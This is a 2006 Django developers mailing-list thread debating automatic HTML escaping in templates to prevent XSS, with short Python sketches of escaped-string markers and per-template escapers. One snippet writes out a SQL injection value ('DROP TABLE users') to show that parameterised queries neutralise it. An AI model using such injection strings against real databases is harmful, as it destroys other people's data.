to django-d...@googlegroups.com
Couldn't we do something less invasive/complicated?

How about

{{ var }}

by default escapes the contents (in other words, the very first
filter called on a variable is escape, by default) and

{{ var|raw }}

skips the call to escape?

It breaks backwards compatibility, but maybe there's a way to avoid
that with a setting of some sort. (Say AUTO_ESCAPE=false in
settings.py for people who don't want the change.)

Todd

Todd O'Bryan

Jun 20, 2006, 7:05:50 AM6/20/06
to django-d...@googlegroups.com
Hey. We came up with this independently. It must be a good idea. :-)

Todd

Michael Radziej

Jun 20, 2006, 7:15:01 AM6/20/06
to django-d...@googlegroups.com
Hi,

I thought a little bit about your remarks and I think all your problems can be solved.

Perhaps it's also a good idea to add an attribute `raw` to the class `escaped`, so that
you can always access the raw string when it is necessary. In some circumstances, such
as when you pass a complete html table in the context, this could simply raise an error.

adurdin wrote:
> Simon Willison wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> A very nice solution, with a good method of automatically flagging
> things as escaped or not; but it seems to me more complicated than is
> needed. And, of course there's more than just html escaping needed;
> URLs should be escaped differently, and other values intended to be
> used as attributes also need a different escape filter -- I'm not sure
> your proposal will allow these to be handled correctly and
> conveniently.

Well then ... one thing after the other, and first things first ;-)

You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.
Or, there could be a separate class, similar to `escaped` from Simon's proposal, that would mark
url-encoded strings. If necessary. I find myself creating links almost completely with template tags, and they
would care about the actual encoding.

> So here's another idea to throw into the soup:
>
> Having the context aware of the primary escaping needs of the output is
> a nice idea, but as James Bennett pointed out, the template is what
> should be making the decision.

I still don't see why. The programmer who has assembled the string should know best
whether it is already escaped or not, (and usually it isn't). The template might know when
to escape an unescaped string, but it can't know if this is a piece of html that should
be left as is.

Note that the escaping does not happen in the context, but during rendering, so that template filters
and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

> Suppose the template render had a
> "default filter" that would get applied to all otherwise unfiltered
> output? Obviously, the default value for this would be
> django.template.defaultfilters.escape -- but it could be set to
> another filter for JSON output, or to None for plain text. One
> possible mechanism for doing this would be a {% default_filter ... %}
> tag in the template...?

That's fine with the proposal. Just have the "default filter" check whether this is already escaped
or not.

> Assuming the default, then {{name}} would be the equivalent of
> {{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
> unchanged, and a new filter "raw" (just a pass-thru) could be used for
> situations like <script>{{myscript|raw}}</script>.

Or: {% autoescape off %}<script>{{myscript}}</script>{% endautoescape %}
Or: write a simple template tag {% script %} if you need this a lot.

>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped. Perhaps having all output
> piped through the default filter unless it is piped through the "raw"
> filter (which could perhaps be handled using Michael's escaped
> strings)?

Michael

Simon Willison

Jun 20, 2006, 7:48:32 AM6/20/06
to django-d...@googlegroups.com
On 20 Jun 2006, at 12:02, Todd O'Bryan wrote:
> Couldn't we do something less invasive/complicated?
>
> How about
>
> {{ var }}
>
> by default escapes the contents (in other words, the very first
> filter called on a variable is escape, by default) and
>
> {{ var|raw }}
>
> skips the call to escape?

This doesn't interact well with many filters - things like urlize or
markdown or any of the filters that expect non-escaped content. They
either have to unescape stuff that is fed to them (nasty) or you need
to manually chain a 'raw' filter in before them (also nasty).
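
A toy illustration of that interaction, in Python. `quote_lines` is a made-up stand-in for a markup filter such as markdown (it is not a Django filter), and `html.escape` stands in for the escape step; the point is only that a filter expecting raw text misbehaves when escaping has already been applied.

```python
from html import escape


def quote_lines(text):
    """Toy markup filter: lines starting with '> ' become blockquotes."""
    out = []
    for line in text.splitlines():
        if line.startswith("> "):
            out.append("<blockquote>" + escape(line[2:]) + "</blockquote>")
        else:
            out.append(escape(line))
    return "\n".join(out)


source = "> a < b"
print(quote_lines(source))          # filter sees the raw text
print(quote_lines(escape(source)))  # filter sees pre-escaped text
```

With the raw input the quote marker is recognised; with the pre-escaped input the leading ">" has already become "&gt;", so the filter misses it and escapes everything a second time.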

> It breaks backwards compatibility, but maybe there's a way to avoid
> that with a setting of some sort. (Say AUTO_ESCAPE=false in
> settings.py for people who don't want the change.)

As discussed previously, I'm dead against a global setting because
they completely kill application portability. PHP's magic quotes
global setting is a great example of this - for a long time there
were apps that expected it to be on and others that expected it to be
off and as a result you couldn't mix and match code.

There are some links to previous discussions on this stuff at the
bottom of http://code.djangoproject.com/wiki/AutoEscaping .

Cheers,

Simon

Simon Willison

Jun 20, 2006, 7:49:23 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 12:15, Michael Radziej wrote:

> Perhaps it's also a good idea to add an attribute `raw` to the
> class `escaped`, so that
> you can always access the raw string when it is necessary. In some
> circumstances, such
> as when you pass a complete html table in the context, this could
> simply raise an error.

I'm not sure that this would be a problem. That's why I want to get a
branch up and running - a lot of the problems with this stuff are
hard to predict until you're running actual code.

Cheers,

Simon

adurdin

Jun 20, 2006, 8:48:34 AM6/20/06
to Django developers
Michael Radziej wrote:

>
> adurdin wrote:
>
> You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.

True.

> > Having the context aware of the primary escaping needs of the output is
> > a nice idea, but as James Bennett pointed out, the template is what
> > should be making the decision.
>
> I still don't see why. The programmer who has assembled the string should know best
> whether it is already escaped or not, (and usually it isn't). The template might know when
> to escape an unescaped string, but it can't know if this is a piece of html that should
> be left as is.

Not at all -- the template author will know based on the source of the
string, and can make an appropriate decision as to whether it should be
passed through raw or not. Although having thought more about this, I
can't see that it offers any benefit over your intelligent
auto-escaping apart from being explicit in the template. The real
benefit of that is probably a matter of opinion.


Regardless, there's another situation that will most likely arise that
needs to be discussed in your proposal: A string of escaped text is to
be rendered with *further* escaping. What should happen for {{
escaped_str|escape }}? One use case for this is a page with both a
preview and an edit field for HTML content:

{{ page_html }}
<textarea>{{ page_html|escape }}</textarea>

Nothing difficult to solve here, just aiming for completeness.


> Note that the escaping does not happen in the context, but during rendering, so that template filters
> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.

One thing that bothered me about the proposal was having the
auto-escape property set in the context; which I believe is the wrong
place; it should be set in the Template instance (or subclass). A
context should be reusable between different templates (e.g. an html
page, a JSON object, an XML page).

Andrew

Michael Radziej

Jun 20, 2006, 9:26:08 AM6/20/06
to django-d...@googlegroups.com
Hey Andrew!

adurdin wrote:
> Michael Radziej wrote:
>> adurdin wrote:
>>> Having the context aware of the primary escaping needs of the output is
>>> a nice idea, but as James Bennett pointed out, the template is what
>>> should be making the decision.
>> I still don't see why. The programmer who has assembled the string should know best
>> whether it is already escaped or not, (and usually it isn't). The template might know when
>> to escape an unescaped string, but it can't know if this is a piece of html that should
>> be left as is.
>
> Not at all -- the template author will know based on the source of the
> string, and can make an appropriate decision as to whether it should be
> passed through raw or not.

Now this is probably the most important point where our discussion boils down.

IMO, the point of auto-escaping is that the template author should not have to worry about
the origin of the string, but about how he uses it. The origin of the string in the
context can change, just for an example. Or are we talking about different meanings
of the word 'origin'? I'm really not sure if I understand you correctly.

> Although having thought more about this, I
> can't see that it offers any benefit over your intelligent
> auto-escaping apart from being explicit in the template. The real
> benefit of that is probably a matter of opinion.

Hmm ... who's the one who does the intelligent auto-escaping, that's the point.
I consider it the job of the programmer, you consider it the job of the template
author. I say that the template author does not know or perhaps not even understand
where the string comes from and whether it is escaped or not; you say the template author
knows best what he uses.

It would be nice to get the opinion of somebody like Jeff Croft or Wilson Miner on this.
Does any of you follow the developers' list?


> Regardless, there's another situation that will most likely arise that
> needs to be discussed in your proposal: A string of escaped text is to
> be rendered with *further* escaping. What should happen for {{
> escaped_str|escape }}? One use case for this is a page with both a
> preview and an edit field for HTML content:
>
> {{ page_html }}
> <textarea>{{ page_html|escape }}</textarea>
> Nothing difficult to solve here, just aiming for completeness.

That's a good one! You need either:

- something to turn an escaped_string into string
- something like "really_really_escape_this"
- a template filter like "html_source" that escapes a string twice and an escaped_string once.

I'm feeling inclined towards the third option. Any use case for another layer of escaping? Then I'd really scratch my head.
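
A minimal sketch of that third option, assuming a marker class for already-escaped text. `EscapedString` and `html_source` are hypothetical names used for illustration, and `html.escape` stands in for the escape filter.

```python
from html import escape


class EscapedString(str):
    """Hypothetical marker type: a string that is already HTML-escaped."""


def html_source(value):
    """Return markup that displays the HTML source of `value`.

    A plain string still needs its normal escaping plus one more layer;
    an EscapedString only needs the extra layer.
    """
    if isinstance(value, EscapedString):
        shown = escape(value)
    else:
        shown = escape(escape(value))
    # Mark the result so a later auto-escape step leaves it alone.
    return EscapedString(shown)


print(html_source(EscapedString("<p>Hi</p>")))  # escaped once
print(html_source("a < b"))                     # escaped twice
```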


>> Note that the escaping does not happen in the context, but during rendering, so that template filters
>> and tags are still able to access the non-escaped form. Of course, you don't want to escape everywhere.
>
> One thing that bothered me about the proposal was having the
> auto-escape property set in the context; which I believe is the wrong
> place; it should be set in the Template instance (or subclass). A
> context should be reusable between different templates (e.g. an html
> page, a JSON object, an XML page).

As long as you don't put any escaped_strings into the context, the context can be used anywhere.
But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
the usage of the context. Thus, I don't see a problem here.

Do you agree, or do you see anything I don't?

Michael

Adrian Holovaty

Jun 20, 2006, 9:36:05 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

I've gotta say, I don't like the concept of auto-escaping on by
default. I'd rather not have the framework automatically munging my
data behind my back: it'd be a case of the same type of magic that we
removed in the magic-removal branch. In-bulk escaping should be an
opt-in thing, not an opt-out thing.

Adrian

--
Adrian Holovaty
holovaty.com | djangoproject.com

James Bennett

Jun 20, 2006, 9:56:44 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Adrian Holovaty <holo...@gmail.com> wrote:
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

I'm 100% in agreement. Most of Simon's proposal looks good to me,
except that I'd want to see autoescape off by default.

Michael Radziej

Jun 20, 2006, 10:11:10 AM6/20/06
to django-d...@googlegroups.com
Adrian Holovaty wrote:
> On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> I've gotta say, I don't like the concept of auto-escaping on by
> default. I'd rather not have the framework automatically munging my
> data behind my back: it'd be a case of the same type of magic that we
> removed in the magic-removal branch. In-bulk escaping should be an
> opt-in thing, not an opt-out thing.

<sarcasm>
You're against automatically quoting your data in the database driver?
Let's rip it out, bad magic that munges your data behind your back.
</sarcasm>

I haven't used the magical versions of Django, but I regard the magic that
has magically imported models a different thing. In every framework things
happen automatically, and just calling it "bad magic" is something that
might result in ending the discussion, but I personally don't consider this
a pretty good argument.

But, looking at the recent bugs in the Admin:

2006, __str__() output not escaped in breadcrumbs and filters
2152, username was not escaped

Perhaps neither of these would be fixed with auto-escaping. But I want to
emphasize that bugs like this happen all the time, are hard to spot and
are inherently dangerous. If you escape too much, you'll spot it easily,
and not much harm has been done.

Automatic quoting in the database layer is great, and does a tremendous job
stopping sql injection bugs. Automatic escaping in the template would be
just as good to stop XSS bugs.
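
For comparison, this is roughly what the database side of the analogy looks like. The sketch uses Python's standard `sqlite3` module rather than Django's own database layer, and the table and value are invented for the example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

hostile = "x'); DROP TABLE users; --"
# The driver binds the value; the caller never quotes it by hand.
conn.execute("INSERT INTO users (name) VALUES (?)", (hostile,))

stored = conn.execute("SELECT name FROM users").fetchone()[0]
row_count = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
print(stored == hostile, row_count)
```

The hostile string is stored verbatim as data and the table survives, without the programmer having to remember anything at the call site.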

Michael

Adrian Holovaty

Jun 20, 2006, 10:25:58 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Michael Radziej <m...@noris.de> wrote:
> <sarcasm>
> You're against automatically quoting your data in the database driver?
> Let's rip it out, bad magic that munges your data behind your back.
> </sarcasm>

I figured somebody might bring up this example, but it isn't quite
analogous. With a database query, you don't really care what the
textual output (SQL) is. With a template, you do.

Simon Willison

Jun 20, 2006, 10:43:32 AM6/20/06
to django-d...@googlegroups.com

On 20 Jun 2006, at 15:11, Michael Radziej wrote:

> But, looking at the recent bugs in the Admin:
>
> 2006, __str__() output not escaped in breadcrumbs and filters
> 2152, username was not escaped
>
> Perhaps neither of these would be fixed with auto-escaping. But I
> want to
> emphasize that bugs like this happen all the time, are hard to spot
> and
> are inherently dangerous. If you escape too much, you'll spot it
> easily,
> and not much harm has been done.

This is exactly why I'm for auto escaping - these bugs sneak in all
over the place; they aren't something that only affects careless or
newbie developers. I bet there's a bunch hiding in the current Django
source code.

If we did have it as an opt-in thing rather than being turned on by
default we'd also have to include a bunch of stuff in the docs saying
"we really, really strongly suggest that you opt-in to this".

I'm actually on the fence as to having it on by default - my gut
feeling is that it's a good idea, since every framework ever that
hasn't done it has been plagued by XSS problems. That said, I don't
think we can get a really good feel for how it works in practise
until we can actually play with working code - which is why I want to
build it in a branch (until we're sure that it works nicely it
definitely shouldn't be inflicted on people following trunk).

Cheers,

Simon

Michael Radziej

Jun 20, 2006, 10:51:26 AM6/20/06
to django-d...@googlegroups.com
Adrian Holovaty wrote:
> On 6/20/06, Michael Radziej <m...@noris.de> wrote:
>> <sarcasm>
>> You're against automatically quoting your data in the database driver?
>> Let's rip it out, bad magic that munges your data behind your back.
>> </sarcasm>
>
> I figured somebody might bring up this example, but it isn't quite
> analogous. With a database query, you don't really care what the
> textual output (SQL) is. With a template, you do.

Really?

* I do depend on the database getting the right data, and not one ' or ` too many. Same for escaping.

* And I don't care whether the programmer has hand-escaped a string or it has happened during template rendering.
Same for the database quotes.

And furthermore:

* It's a lot more important that my site does not have XSS holes, which I usually don't find,
than whether I get a string escaped multiple times here and there, which I usually spot
during testing. Perhaps I'm obsessed with security, but why shouldn't I be? And: same for the database quotes.

I'm really curious where this dislike for auto-escaping comes from. Does it come from php? I'd like to follow you or convince you, but I cannot as long as I don't understand what your reason or experience with this is.

Let me add that I share Simon's opinion that this needs to get tried out to see how it feels in practice.

Michael

James Bennett

Jun 20, 2006, 11:25:03 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Michael Radziej <m...@noris.de> wrote:
> I haven't used the magical versions of Django, but I regard the magic that
> has magically imported models a different thing. In every framework things
> happen automatically, and just calling it "bad magic" is something that
> might result in ending the discussion, but I personally don't consider this
> a pretty good argument.

Having an easy-to-use mechanism like a block tag which escapes
everything inside it is good; a template author can just stick {%
autoescape on %} at the top of a file and {% endautoescape %} at the
end, and not have to worry. This would likely be used in the admin.

But having a block tag which does escaping *and* having it on by
default is a bit magical and is just asking for problems in the same
vein as PHP's magic_quotes. It also feels like overkill; on my blog,
for example, there are only a couple places where I need to escape
content (comments and search results pages, since both display content
that came from users). Having to remember to turn off escaping
elsewhere for all the other places where I *want* to output HTML would
seriously annoy me and wouldn't be worth the benefit.

Security by annoyance is security that people learn to hate and turn
off as soon as they can, so in the end it doesn't really make them any
more secure than they were before.

Simon Willison

Jun 20, 2006, 11:49:56 AM6/20/06
to django-d...@googlegroups.com
On 20 Jun 2006, at 16:25, James Bennett wrote:

> Security by annoyance is security that people learn to hate and turn
> off as soon as they can, so in the end it doesn't really make them any
> more secure than they were before.

Agreed - which is why I want to try it in a branch and see if it's
actually annoying :)

Cheers,

Simon

Tom Tobin

Jun 20, 2006, 11:57:52 AM6/20/06
to django-d...@googlegroups.com
On 6/20/06, Simon Willison <swil...@gmail.com> wrote:
>

The problem is that the only ones testing that branch would be those
already inclined towards default-on autoescaping; those of us who are
against it *already know* it would be annoying. :-p

Daniel Poelzleithner

Jun 20, 2006, 12:52:30 PM6/20/06
to django-d...@googlegroups.com
Simon Willison wrote:
>
> On 19 Jun 2006, at 21:00, pub...@kered.org wrote:
>
>> anyway, i suppose i will wait for you to elaborate on your
>> reasoning in
>> the wiki this evening. :)
>
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

I like much of this stuff.

Here some further ideas:

1. I don't like needing {% endautoescape %} just to print an unescaped variable.
Maybe the idea of the python string type prefix would help here and
would allow further improvements to be implemented nicely (thinking about
unicode problems...)

{{r#somevariable}} or {{r:somevariable}}

Even if the last one looks strange at first, it is logical under the idea
that r is just like any other function and generates an escapedstr out
of a string, or an escapedunicodestring out of a unicode string.

2. Currently autoescape, or rather escape in general, escapes <, >, etc.
But if you have a different type of output, you have to do
everything by hand or write other filters, which could get messy.

{% escape_type tex|cvs|something... %}

would set a reference to the escape function of this template instance,
which defaults to html. escape and autoescapestring would use this
reference instead of a hard-coded escape function. This would allow
writing clean templates, with almost no bloat in the implementation.
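
One way to picture the escape_type idea is a registry of escape functions keyed by output type, with each template holding a reference to one of them. Everything here is an assumption made for illustration: the `ESCAPERS` table, the `Template` class and the `tex`/`csv` escapers are hypothetical and deliberately minimal, not Django code.

```python
from html import escape as html_escape

TEX_SPECIALS = {
    "\\": r"\textbackslash{}", "&": r"\&", "%": r"\%", "$": r"\$",
    "#": r"\#", "_": r"\_", "{": r"\{", "}": r"\}",
}


def tex_escape(text):
    # Character-by-character, so replacements are never escaped again.
    return "".join(TEX_SPECIALS.get(ch, ch) for ch in text)


def csv_escape(text):
    # Quote the field and double any embedded quotes.
    return '"' + text.replace('"', '""') + '"'


ESCAPERS = {"html": html_escape, "tex": tex_escape, "csv": csv_escape}


class Template:
    """Holds a reference to the escape function for its output type."""

    def __init__(self, escape_type="html"):
        self.escape = ESCAPERS[escape_type]

    def render_variable(self, value):
        return self.escape(str(value))


print(Template().render_variable("<b>"))
print(Template("tex").render_variable("50% & more"))
print(Template("csv").render_variable('say "hi"'))
```

Both an explicit escape filter and the automatic escaping would then call `self.escape` rather than a fixed HTML escaper.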

kindly regards
Daniel

Linicks

Jun 20, 2006, 7:24:38 PM6/20/06
to Django developers

All,
Would it be possible to do a validation test against the templates at
startup, and/or with a separate utility?

Something like : #python manage.py cktemp appname

I guess I was thinking of something like XML validation. The advantage
of this is that it wouldn't be automatically manipulating anything,
just letting you know that there is a problem. I'm not really
supportive of anything that would encourage bad practice. For example
HTML was so unrestricted that you could get away with almost anything,
with XHTML you actually have to do things properly and validate your
work.

Thanks!
--Nick
P.S. Sorry if I missed a similar suggestion in an earlier thread :)

adurdin

Jun 21, 2006, 8:32:16 AM6/21/06
to Django developers
Michael Radziej wrote:
>
> IMO, the point of auto-escaping is that the template author should not have to worry about
> the origin of the string, but about how he uses it. The origin of the string in the
> context can change, just for an example. Or are we talking about different meanings
> of the word 'origin'? I'm really not sure if I understand you correctly.

What I was thinking of here was just reversing the existing situation:
so that everything would be escaped by default (at the last minute only
-- just before it's output into the rendered string) unless explicitly
marked otherwise (the "raw" filter in my examples) -- no automatic
decisions based on settings made in the tag functions or anywhere.

> Hmm ... who's the one who does the intelligent auto-escaping, that's the point.
> I consider it the job of the programmer, you consider it the job of the template
> author.

That's it in a nutshell.

> I say that the template author does not know or perhaps not even understand
> where the string comes from and whether it is escaped or not; you say the template author
> knows best what he uses.

I would expect the template author to be competent with HTML and to
understand the need for escaping. But then the same has to hold anyway
for the programmer... :-)
I don't think there's a "right" answer here, at least not obviously --
either way has pros and cons. I lean towards trying to do less
'magic', because things are usually more inherently predictable that
way:

What's the result of {{ foo|bar|baz }}?

With escaped_strings, the answer depends on (a) whether foo is an
escaped_string, (b) how 'bar' handles strings vs. escaped_strings as
input, (c) whether 'bar' outputs strings or escaped_strings, (d) how
'baz' handles strings vs. escaped_strings as input, (e) whether 'baz'
outputs strings or escaped_strings, and (f) the auto_escape setting.
(And if either bar or baz delegates most of its work to an existing
filter because it's only a small enhancement upon it... you get the
picture)

With my last-minute escape-unless-told-otherwise, the answer only
depends on (f) the auto_escape setting (as there's no |raw filter
here).

Hence, with escaped_strings, there need to be strong guidelines (if not
rules) concerning how filters and tags should deal with
escaped_strings, so that the answers to (b), (c), (d), and (e) can be
predictable.

> > {{ page_html }}
> > <textarea>{{ page_html|escape }}</textarea>
> > Nothing difficult to solve here, just aiming for completeness.
>
> That's a good one! You need either:
>
> - something to turn an escaped_string into string
> - something like "really_really_escape_this"
> - a template filter like "html_source" that escapes a string twice and an escaped_string once.
>
> I'm feeling inclined towards the third option.

It all depends on how you want the default "escape" filter to behave:
should {{ greater_than|escape|escape|escape }} produce "&gt;" or
"&amp;amp;gt;"? I say the "escape" filter should always escape --
whether the string it's given is a string or escaped_string. Simple, and
obvious/explicit ("I say escape, and it escapes").
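
The two behaviours can be compared directly. In this sketch `html.escape` stands in for the escape filter, and `EscapedString`, `escape_always` and `escape_once` are hypothetical names for the two policies.

```python
from html import escape


class EscapedString(str):
    """Hypothetical marker for text that is already HTML-escaped."""


def escape_always(value):
    # Escapes unconditionally, whatever it is given.
    return EscapedString(escape(value))


def escape_once(value):
    # Leaves already-marked strings alone.
    if isinstance(value, EscapedString):
        return value
    return EscapedString(escape(value))


always = once = ">"
for _ in range(3):
    always = escape_always(always)
    once = escape_once(once)

print(always)  # &amp;amp;gt;
print(once)    # &gt;
```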


> > One thing that bothered me about the proposal was having the
> > auto-escape property set in the context; which I believe is the wrong
> > place; it should be set in the Template instance (or subclass). A
> > context should be reusable between different templates (e.g. an html
> > page, a JSON object, an XML page).
>
> As long as you don't put any escaped_strings into the context, the context can be used anywhere.
> But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
> the usage of the context. Thus, I don't see a problem here.
>
> Do you agree, or do you see anything I don't?

No, it's only an issue with unescaped strings. Say I've got a view
which produces either json output (for an API interface) or html output
(for a browser interface) -- I want to use the same context for both,
because they're displaying the same data (perhaps even some html code
which gets used for innerHTML by the API); but I don't want the json
one to do the automatic html escaping, or my json strings will be
messed up.

I'm trying to illustrate with this that the auto_escape flag doesn't
logically belong as a property of the context, but instead as a
property of the template instance or template subclass, or the
renderer's state. Either that or I'm completely misunderstanding the
intended uses of the Context class.

Andrew

Michael Radziej

Jun 21, 2006, 9:18:50 AM6/21/06
to django-d...@googlegroups.com
Hi Andrew,

it appears to be decided that Adrian won't include auto-escaping,
but I'd like to round up this discussion so that we can gather
the pros and cons somewhere. I bet that this discussion will pop
up again ...

As far as I can see, the discussion looks pretty thorough. I
acknowledge your statements. While auto-escaping could surely
help a lot in preventing XSS, it's not certain whether it
would complicate things too much. I'd like to see how it
looks in reality before I make up my own mind.


Just one thing I'd like to comment:

>>> One thing that bothered me about the proposal was having the
>>> auto-escape property set in the context; which I believe is the wrong
>>> place; it should be set in the Template instance (or subclass). A
>>> context should be reusable between different templates (e.g. an html
>>> page, a JSON object, an XML page).
>> As long as you don't put any escaped_strings into the context, the context can be used anywhere.
>> But as soon as you put any html-escaped stuff into it, you (as programmer) have restricted
>> the usage of the context. Thus, I don't see a problem here.
>>
>> Do you agree, or do you see anything I don't?
>
> No, it's only an issue with unescaped strings. Say I've got a view
> which produces either json output (for an API interface) or html output
> (for a browser interface) -- I want to use the same context for both,
> because they're displaying the same data (perhaps even some html code
> which gets used for innerHTML by the API); but I don't want the json
> one to do the automatic html escaping, or my json strings will be
> messed up.

Yes, and this must be avoided. See item (a) below.

> I'm trying to illustrate with this that the auto_escape flag doesn't
> logically belong as a property of the context, but instead as a
> property of the template instance or template subclass, or the
> renderer's state. Either that or I'm completely misunderstanding the
> intended uses of the Context class.

There are three aspects of auto-escaping:

(a) The kind of auto-escaping depends on the usage of the
template and needs to be an attribute of the template (or coded
in the Template subclass).

(b) Whether or not a string needs to be escaped if it is not
already, depends on the surrounding in the template. Thus, we
need a method to switch it off by template tags or
programmatically within a template filter or tag.

(c) Whether or not a string is already in escaped form needs to
be marked by the programmer in the view, manipulator or elsewhere.
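
The three aspects can be put together in a rough Python sketch. The names `Escaped`, `Template`, `escaper` and the `autoescape` argument are assumptions made for this illustration and do not describe an existing Django API; `html.escape` and `json.dumps` stand in for the per-template escape functions.

```python
import json
from html import escape as html_escape


class Escaped(str):
    """(c) Marker set by the programmer: this text is already escaped."""


class Template:
    def __init__(self, escaper=html_escape):
        # (a) The kind of escaping is an attribute of the template.
        self.escaper = escaper

    def render_variable(self, value, autoescape=True):
        # (b) A tag or filter can switch escaping off for its surroundings.
        if isinstance(value, Escaped) or not autoescape or self.escaper is None:
            return str(value)
        return self.escaper(str(value))


html_tmpl = Template()
json_tmpl = Template(escaper=json.dumps)

print(html_tmpl.render_variable("<i>"))                    # escaped for HTML
print(html_tmpl.render_variable(Escaped("<i>")))           # left as is
print(html_tmpl.render_variable("<i>", autoescape=False))  # switched off
print(json_tmpl.render_variable('a "b"'))                  # JSON string literal
```

The same unmarked context value can be handed to both templates. A value marked `Escaped` is passed through by either one, which is the restriction on context reuse discussed above.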

Michael

Derek Hoy

Jun 21, 2006, 9:20:02 AM6/21/06
to django-d...@googlegroups.com
On 6/20/06, SmileyChris <smile...@gmail.com> wrote:
>
> But it is an escaping issue.

Isn't the most common use case for this the problem of people entering
bad stuff into a form? In which case, regarding it as a validation
issue seems good to me.

For example, I used Webmin a few days ago to fix some problems
directly in the DB tables, so any bad html could have been fired up on
viewing the data. If I don't want people entering it, I don't want it
in the DB, having to be escaped each time it's viewed.

--
a different Derek

Michael Radziej

Jun 21, 2006, 9:28:37 AM6/21/06
to django-d...@googlegroups.com
Derek Hoy wrote:
> On 6/20/06, SmileyChris <smile...@gmail.com> wrote:
>> But it is an escaping issue.
>
> Isn't the most common use case for this the problem of people entering
> bad stuff into a form? In which case, regarding it as a validation
> issue seems good to me.

This is the perl-taint-approach. But it isn't very user friendly.
It means that you forbid the use of e.g. "<" in text fields, just
because you might somewhere have forgotten to escape your data.

Michael

pub...@kered.org

Jun 21, 2006, 10:26:06 AM6/21/06
to django-d...@googlegroups.com
not true. no browser interprets a single "<" as a tag unless it has a
valid tag name (and company) and closing ">" directly after it. only the
most rudimentary implementations would blindly strip "<"s without looking
at their context.

(and they would be wrong anyway - consider <input value="<">)

Michael Radziej

Jun 21, 2006, 10:47:18 AM6/21/06
to django-d...@googlegroups.com
pub...@kered.org wrote:
> not true. no browser interprets a single "<" as a tag unless it has a
> valid tag name (and company) and closing ">" directly after it. only the
> most rudimentary implementations would blindly strip "<"s without looking
> at their context.

So, how exactly would you validate the input without forbidding
anything?

Michael


Pete Crosier

unread,
Jun 21, 2006, 11:17:46 AM6/21/06
to django-d...@googlegroups.com
"My vote is for escaping being off unless explicitly turned on, and for it being turned on in the template."

My thoughts exactly, my templates are the places that define the output of my applications. I can see the benefits of people being able to define how escaping happens _in the template_, _if they want it to_ .. but I know the first thing I'd do in an on-by-default situation would be to turn it off.
 
By all means, encourage some security through education in the documentation. But hang back on the magic, which it will seem like to some people in a team.

pub...@kered.org

unread,
Jun 21, 2006, 12:06:34 PM6/21/06
to django-d...@googlegroups.com
no one said "forbid nothing". i said "you don't need to forbid all '<'s",
which is what you proposed was a problem with a data validation take.

you would obviously forbid html in an HTMLSafeCharField, which does limit
user's input. i'm just saying that in the vast, vast, vast majority of
form inputs, db fields, etc., html is an invalid input anyway, so this is
a trivial restriction.

plus remember that this would be optional, per-field, and not the default.
(ie, i'm not suggesting we modify the CharField to by default forbid
html)

Michael Radziej

unread,
Jun 21, 2006, 12:25:18 PM6/21/06
to django-d...@googlegroups.com
pub...@kered.org wrote:
> no one said "forbid nothing". i said "you don't need to forbid all '<'s",
> which is what you proposed was a problem with a data validation take.

My point was that your approach restricts user input. "<" was a
simple example for this.

Note that, first, it's not really simple to catch all html tags in
forms that *any* browser on the market might take for html
markup--some browsers accept really weird forms. Second, it's not
really a good reason to restrict user input simply because you're
unable to escape your data properly.

There are other reasons why validating user input in general is a
good thing, of course. But it does not solve the escape problem,
since you also need free-form text entry fields.

Michael

James Bennett

unread,
Jun 21, 2006, 12:48:25 PM6/21/06
to django-d...@googlegroups.com
The more I think about it, the more I find I have two objections to
the auto-escaping stuff.

1. A philosophical objection. One thing Django does, and does pretty
well IMHO, is encourage best practices. Pretty much every aspect of
Django, from the overall architecture of the framework to the workings
of individual bits, involves some sort of explicit "this is a good way
to do things"; whether it's the loose coupling of the major components
or little things like encouraging the use of HttpResponseRedirect
after a POST, we do our best not to magically enforce these practices,
but to explain why they _are_ best practices and why you should take
advantage of our support for them. The result is that people both use
_and_ understand these best practices, which makes them better
developers and leads them to build better apps. Any form of
automatically-enabled escaping would be a serious break with this, and
would move us out of the realm of "this is a good way to do it" into
"this is what we say is the right way to do it, and we're going to try
to make you do it this way". I don't like that.

2. A security objection. Escaping content on output is only half the
battle; there's no such thing as a truly secure web application, and
escaping content on output glosses that over by pretending that a
magic incantation will solve XSS problems. The best practice for
securing against XSS also involves, at the very least, doing input
sanitization as well -- relying on output escaping alone both concedes
that malicious users can get what they want into your database, and
creates a single point of failure. If there's a bug in the escaping
system, or if someone forgets to use the correct escaping commands,
then the unsafe data that was stored can be sent down the wire to
wreak havoc. If input sanitization is in use as well, that's one more
layer of protection that can keep unsafe data from ever getting to the
DB.

So, here's a proposal:

Let's implement the escaping system -- off by default -- and play up
that any time you're outputting something which came from a
non-trusted source you should escape it. Some people will likely
continue to rely on selective application of the existing 'escape'
filter, but there are bound to be situations where a block tag is a
better solution so the flexibility of having both will be good.

And while we're at it, let's get serious about input handling. The
first thing which occurs to me is to add a 'hasNoHTML' validator in
django.core.validators; possibly this would be accompanied by a
boolean 'allows_html' argument to TextFields and CharFields, or maybe
we just advertise judicious use of validator_list. Either way, the
